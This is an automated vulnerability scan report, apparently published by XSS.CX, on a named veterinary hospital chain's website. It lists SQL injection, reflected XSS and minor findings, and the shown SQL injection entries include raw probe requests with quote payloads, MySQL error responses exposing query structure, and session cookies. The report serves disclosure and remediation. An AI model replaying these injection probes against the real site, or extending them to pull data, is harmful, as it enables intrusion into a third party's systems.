XSS, SQL Injection, CWE-79, CWE-89, CAPEC-86, CAPEC-66, www.vcahospitals.com

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Mar 05 06:53:38 CST 2011.



1. SQL injection

1.1. http://www.vcahospitals.com/hanson [REST URL parameter 1]

1.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 1]

1.3. http://www.vcahospitals.com/main/directory.html [REST URL parameter 1]

1.4. http://www.vcahospitals.com/main/img/blockquote-left.png [REST URL parameter 1]

1.5. http://www.vcahospitals.com/main/img/blockquote-right.png [REST URL parameter 1]

1.6. http://www.vcahospitals.com/main/img/sema-landing.jpg [REST URL parameter 1]

1.7. http://www.vcahospitals.com/main/offer [REST URL parameter 1]

1.8. http://www.vcahospitals.com/main/offer [REST URL parameter 1]

1.9. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]

1.10. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]

1.11. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]

1.12. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]

1.13. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 1]

1.14. http://www.vcahospitals.com/marshfield [REST URL parameter 1]

1.15. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 1]

1.16. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 1]

1.17. http://www.vcahospitals.com/plymouth [REST URL parameter 1]

1.18. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 1]

1.19. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 1]

1.20. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]

2. Cross-site scripting (reflected)

2.1. http://www.vcahospitals.com/becker/markers.php [REST URL parameter 2]

2.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 2]

2.3. http://www.vcahospitals.com/hanson/appt.html [altphone parameter]

2.4. http://www.vcahospitals.com/hanson/appt.html [ampm1 parameter]

2.5. http://www.vcahospitals.com/hanson/appt.html [ampm2 parameter]

2.6. http://www.vcahospitals.com/hanson/appt.html [ampm3 parameter]

2.7. http://www.vcahospitals.com/hanson/appt.html [name of an arbitrarily supplied request parameter]

2.8. http://www.vcahospitals.com/hanson/offer.html [addr parameter]

2.9. http://www.vcahospitals.com/hanson/offer.html [captcha_code parameter]

2.10. http://www.vcahospitals.com/hanson/offer.html [city parameter]

2.11. http://www.vcahospitals.com/hanson/offer.html [email parameter]

2.12. http://www.vcahospitals.com/hanson/offer.html [fname parameter]

2.13. http://www.vcahospitals.com/hanson/offer.html [formtype parameter]

2.14. http://www.vcahospitals.com/hanson/offer.html [guid parameter]

2.15. http://www.vcahospitals.com/hanson/offer.html [ipaddress parameter]

2.16. http://www.vcahospitals.com/hanson/offer.html [js parameter]

2.17. http://www.vcahospitals.com/hanson/offer.html [lname parameter]

2.18. http://www.vcahospitals.com/main/offer [ parameter]

2.19. http://www.vcahospitals.com/main/offer [&optin parameter]

2.20. http://www.vcahospitals.com/main/offer [&state parameter]

2.21. http://www.vcahospitals.com/main/offer [addr parameter]

2.22. http://www.vcahospitals.com/main/offer [city parameter]

2.23. http://www.vcahospitals.com/main/offer [date parameter]

2.24. http://www.vcahospitals.com/main/offer [email parameter]

2.25. http://www.vcahospitals.com/main/offer [fname parameter]

2.26. http://www.vcahospitals.com/main/offer [formtype parameter]

2.27. http://www.vcahospitals.com/main/offer [gclid parameter]

2.28. http://www.vcahospitals.com/main/offer [guid parameter]

2.29. http://www.vcahospitals.com/main/offer [ipaddress parameter]

2.30. http://www.vcahospitals.com/main/offer [lname parameter]

2.31. http://www.vcahospitals.com/main/offer [name of an arbitrarily supplied request parameter]

2.32. http://www.vcahospitals.com/main/offer [newmex parameter]

2.33. http://www.vcahospitals.com/main/offer [optin parameter]

2.34. http://www.vcahospitals.com/main/offer [other parameter]

2.35. http://www.vcahospitals.com/main/offer [petage parameter]

2.36. http://www.vcahospitals.com/main/offer [petname parameter]

2.37. http://www.vcahospitals.com/main/offer [pettype parameter]

2.38. http://www.vcahospitals.com/main/offer [phone parameter]

2.39. http://www.vcahospitals.com/main/offer [r parameter]

2.40. http://www.vcahospitals.com/main/offer [referer parameter]

2.41. http://www.vcahospitals.com/main/offer [state parameter]

2.42. http://www.vcahospitals.com/main/offer [submit parameter]

2.43. http://www.vcahospitals.com/main/offer [token parameter]

2.44. http://www.vcahospitals.com/main/offer [tollfree parameter]

2.45. http://www.vcahospitals.com/main/offer [uri parameter]

2.46. http://www.vcahospitals.com/main/offer [useragent parameter]

2.47. http://www.vcahospitals.com/main/offer [utm_campaign parameter]

2.48. http://www.vcahospitals.com/main/offer [utm_medium parameter]

2.49. http://www.vcahospitals.com/main/offer [utm_source parameter]

2.50. http://www.vcahospitals.com/main/offer [utm_term parameter]

2.51. http://www.vcahospitals.com/main/offer [variant parameter]

2.52. http://www.vcahospitals.com/main/offer [zip parameter]

2.53. http://www.vcahospitals.com/main/offer/ [ parameter]

2.54. http://www.vcahospitals.com/main/offer/ [&optin parameter]

2.55. http://www.vcahospitals.com/main/offer/ [&state parameter]

2.56. http://www.vcahospitals.com/main/offer/ [addr parameter]

2.57. http://www.vcahospitals.com/main/offer/ [city parameter]

2.58. http://www.vcahospitals.com/main/offer/ [date parameter]

2.59. http://www.vcahospitals.com/main/offer/ [email parameter]

2.60. http://www.vcahospitals.com/main/offer/ [fname parameter]

2.61. http://www.vcahospitals.com/main/offer/ [formtype parameter]

2.62. http://www.vcahospitals.com/main/offer/ [guid parameter]

2.63. http://www.vcahospitals.com/main/offer/ [ipaddress parameter]

2.64. http://www.vcahospitals.com/main/offer/ [lname parameter]

2.65. http://www.vcahospitals.com/main/offer/ [name of an arbitrarily supplied request parameter]

2.66. http://www.vcahospitals.com/main/offer/ [newmex parameter]

2.67. http://www.vcahospitals.com/main/offer/ [optin parameter]

2.68. http://www.vcahospitals.com/main/offer/ [other parameter]

2.69. http://www.vcahospitals.com/main/offer/ [petage parameter]

2.70. http://www.vcahospitals.com/main/offer/ [petname parameter]

2.71. http://www.vcahospitals.com/main/offer/ [pettype parameter]

2.72. http://www.vcahospitals.com/main/offer/ [phone parameter]

2.73. http://www.vcahospitals.com/main/offer/ [referer parameter]

2.74. http://www.vcahospitals.com/main/offer/ [state parameter]

2.75. http://www.vcahospitals.com/main/offer/ [submit parameter]

2.76. http://www.vcahospitals.com/main/offer/ [token parameter]

2.77. http://www.vcahospitals.com/main/offer/ [tollfree parameter]

2.78. http://www.vcahospitals.com/main/offer/ [uri parameter]

2.79. http://www.vcahospitals.com/main/offer/ [useragent parameter]

2.80. http://www.vcahospitals.com/main/offer/ [variant parameter]

2.81. http://www.vcahospitals.com/main/offer/ [zip parameter]

2.82. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]

2.83. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]

2.84. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 2]

2.85. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter]

2.86. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 2]

2.87. http://www.vcahospitals.com/marshfield/appt.html [name of an arbitrarily supplied request parameter]

2.88. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 2]

2.89. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [altphone parameter]

2.90. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm1 parameter]

2.91. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm2 parameter]

2.92. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm3 parameter]

2.93. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [appt_type parameter]

2.94. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [client parameter]

2.95. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date1 parameter]

2.96. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date2 parameter]

2.97. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date3 parameter]

2.98. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [doctor parameter]

2.99. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [email parameter]

2.100. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [fname parameter]

2.101. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [guid parameter]

2.102. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ipaddress parameter]

2.103. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [lname parameter]

2.104. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter]

2.105. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [optin parameter]

2.106. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [other parameter]

2.107. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petage parameter]

2.108. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petname parameter]

2.109. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [pettype parameter]

2.110. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [phone parameter]

2.111. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [reason parameter]

2.112. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [referer parameter]

2.113. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [source parameter]

2.114. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [submit parameter]

2.115. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time1 parameter]

2.116. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time2 parameter]

2.117. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time3 parameter]

2.118. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [token parameter]

2.119. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [uri parameter]

2.120. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [useragent parameter]

2.121. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 2]

2.122. http://www.vcahospitals.com/plymouth/appt.html [name of an arbitrarily supplied request parameter]

2.123. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 2]

2.124. http://www.vcahospitals.com/hanson/appt.html [Referer HTTP header]

2.125. http://www.vcahospitals.com/hanson/appt.html [User-Agent HTTP header]

2.126. http://www.vcahospitals.com/main/offer [Referer HTTP header]

2.127. http://www.vcahospitals.com/main/offer [User-Agent HTTP header]

2.128. http://www.vcahospitals.com/main/offer/ [Referer HTTP header]

2.129. http://www.vcahospitals.com/main/offer/ [User-Agent HTTP header]

2.130. http://www.vcahospitals.com/main/offer/thank-you.html [Referer HTTP header]

2.131. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [Referer HTTP header]

2.132. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [User-Agent HTTP header]

2.133. http://www.vcahospitals.com/marshfield/appt.html [Referer HTTP header]

2.134. http://www.vcahospitals.com/marshfield/appt.html [User-Agent HTTP header]

2.135. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [Referer HTTP header]

2.136. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [User-Agent HTTP header]

2.137. http://www.vcahospitals.com/plymouth/appt.html [Referer HTTP header]

2.138. http://www.vcahospitals.com/plymouth/appt.html [User-Agent HTTP header]

3. SQL statement in request parameter

3.1. http://www.vcahospitals.com/main/offer

3.2. http://www.vcahospitals.com/main/offer/

3.3. http://www.vcahospitals.com/main/offer/thank-you.html

3.4. http://www.vcahospitals.com/tools/markers_sema.php

4. Session token in URL

4.1. http://www.vcahospitals.com/hanson/appt.html

4.2. http://www.vcahospitals.com/hanson/offer.html

4.3. http://www.vcahospitals.com/main/offer

4.4. http://www.vcahospitals.com/main/offer/

4.5. http://www.vcahospitals.com/main/offer/thank-you.html

4.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

5. Cookie without HttpOnly flag set

5.1. http://www.vcahospitals.com/hanson/appt.html

5.2. http://www.vcahospitals.com/hanson/offer.html

5.3. http://www.vcahospitals.com/main/offer

5.4. http://www.vcahospitals.com/main/offer/

5.5. http://www.vcahospitals.com/main/offer/thank-you.html

5.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

6. Referer-dependent response

6.1. http://www.vcahospitals.com/hanson/appt.html

6.2. http://www.vcahospitals.com/main/offer

6.3. http://www.vcahospitals.com/main/offer/

6.4. http://www.vcahospitals.com/main/offer/thank-you.html

6.5. http://www.vcahospitals.com/marshfield/appt.html

7. Cross-domain Referer leakage

7.1. http://www.vcahospitals.com/hanson/appt.html

7.2. http://www.vcahospitals.com/hanson/offer.html

7.3. http://www.vcahospitals.com/main/directory.html

7.4. http://www.vcahospitals.com/main/offer

7.5. http://www.vcahospitals.com/main/offer/thank-you.html

7.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

8. Cross-domain script include

8.1. http://www.vcahospitals.com/favicon.ico

8.2. http://www.vcahospitals.com/hanson

8.3. http://www.vcahospitals.com/hanson/appt.html

8.4. http://www.vcahospitals.com/hanson/offer.html

8.5. http://www.vcahospitals.com/main/directory.html

8.6. http://www.vcahospitals.com/main/offer

8.7. http://www.vcahospitals.com/main/offer/thank-you.html

8.8. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html

8.9. http://www.vcahospitals.com/marshfield

8.10. http://www.vcahospitals.com/marshfield/appt.html

8.11. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

8.12. http://www.vcahospitals.com/plymouth

8.13. http://www.vcahospitals.com/plymouth/appt.html

8.14. http://www.vcahospitals.com/plymouth/more/boarding.html

9. TRACE method is enabled

10. Email addresses disclosed

11. HTML does not specify charset

11.1. http://www.vcahospitals.com/tools/SMSComm.php

11.2. http://www.vcahospitals.com/tools/markers_sema.php

12. Content type incorrectly stated

12.1. http://www.vcahospitals.com/tools/SMSComm.php

12.2. http://www.vcahospitals.com/tools/markers_sema.php



1. SQL injection
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.vcahospitals.com/hanson [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /hanson' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='hanson''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson''                        
                        limit 1' at line 31

Request 2

GET /hanson'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:08 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...

1.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /hanson'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='hanson''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson''                        
                        limit 1' at line 31

Request 2

GET /hanson''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.3. http://www.vcahospitals.com/main/directory.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/directory.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/directory.html?utm_content=link.corp.ffe.locator. HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.5.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:45:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.4. http://www.vcahospitals.com/main/img/blockquote-left.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/img/blockquote-left.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/blockquote-left.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.5. http://www.vcahospitals.com/main/img/blockquote-right.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/img/blockquote-right.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/blockquote-right.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.6. http://www.vcahospitals.com/main/img/sema-landing.jpg [REST URL parameter 1]

Summary

